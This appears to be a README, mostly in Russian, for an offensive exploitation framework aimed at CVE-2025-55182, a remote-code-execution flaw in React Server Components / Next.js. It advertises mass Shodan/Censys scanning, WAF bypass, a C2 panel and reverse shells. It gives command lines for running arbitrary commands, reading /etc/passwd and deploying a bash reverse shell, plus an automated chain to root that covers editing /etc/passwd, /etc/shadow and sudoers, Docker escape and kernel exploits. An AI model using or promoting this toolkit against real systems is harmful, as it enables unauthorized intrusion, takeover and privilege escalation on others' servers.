
Элитный набор инструментов для эксплуатации CVE-2025-55182 (RCE в серверных компонентах React). Асинхронные полиморфные полезные нагрузки, продвинутый обход WAF/CDN, ротация прокси, массовое сканирование Shodan/Censys, авто-pwn + обратные шеллы, шаблоны Nuclei, лаборатория K8s и панель управления C2. Автор: Sudeepa Wanigarathna – строго для авторизованного тестирования на проникновение и red team.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Автор: Sudeepa Wanigarathna
Профессиональный каркас эксплуатации уязвимости RCE в Server Actions Next.js (React2Shell). Демонстрирует полную цепочку атак от первоначального доступа до повышения привилегий до root.
Возможности:
# Check vulnerability
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Execute command
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Complete exploitation: RCE → Enumeration → Root Access
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Основной движок эксплойта (400+ строк)
├── demo_exploit.py # Автоматизированная цепочка атак (290+ строк)
├── interactive_shell.py # Интерактивная оболочка (280+ строк)
├── reverse_shell_handler.py # Обработчик обратной оболочки (180+ строк)
├── post_exploit/
│ ├── linux_enum.py # Сбор информации о системе (330+ строк)
│ ├── priv_esc.py # Повышение привилегий (320+ строк)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Полная документация по использованию
├── QUICKSTART.md # Краткий справочник
└── BANNER.txt
# Vulnerability check
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Execute commands
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Different payload variants
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# With obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Launch shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Available commands:
# - execute <cmd> : Execute shell command
# - enum : Run full enumeration
# - escalate : Attempt privilege escalation
# - upload <local> <remote> : Upload file
# - download <remote> <local>: Download file
# - shell <lhost> <lport>: Deploy reverse shell
# - info : Show session info
# - exit : Quit
# Terminal 1: Start listener
python3 reverse_shell_handler.py --lport 4444
# Terminal 2: Deploy shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Full chain: Discovery → RCE → Enum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Каркас реализует полную 6-шаговую цепочку эксплуатации:
id/etc/shadow и выводом содержимого /rootSUID-бинарники (GTFOBins)
Файлы /etc с возможностью записи
/etc/passwd — добавление нового пользователя с правами root/etc/shadow — сброс пароля root/etc/sudoers — предоставление sudo без пароляВыход из Docker
Эксплойты ядра
Возможности Linux
pip install -r requirements.txt
Зависимости:
EXPLOITATION_GUIDE.md — полное руководство по использованию с примерамиQUICKSTART.md — краткий справочник по основным командамПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам является незаконным. Используйте только в системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.
Автор не несет ответственности за неправомерное использование этого инструмента. Используйте на свой страх и риск.
Этот каркас предназначен для:
MIT License (только для образовательных целей)
Sudeepa Wanigarathna
Версия: 1.0
Последнее обновление: Декабрь 2025
Статус лаборатории: http://127.0.0.1:3000 (Работает)
Подробные инструкции по использованию см. в EXPLOITATION_GUIDE.md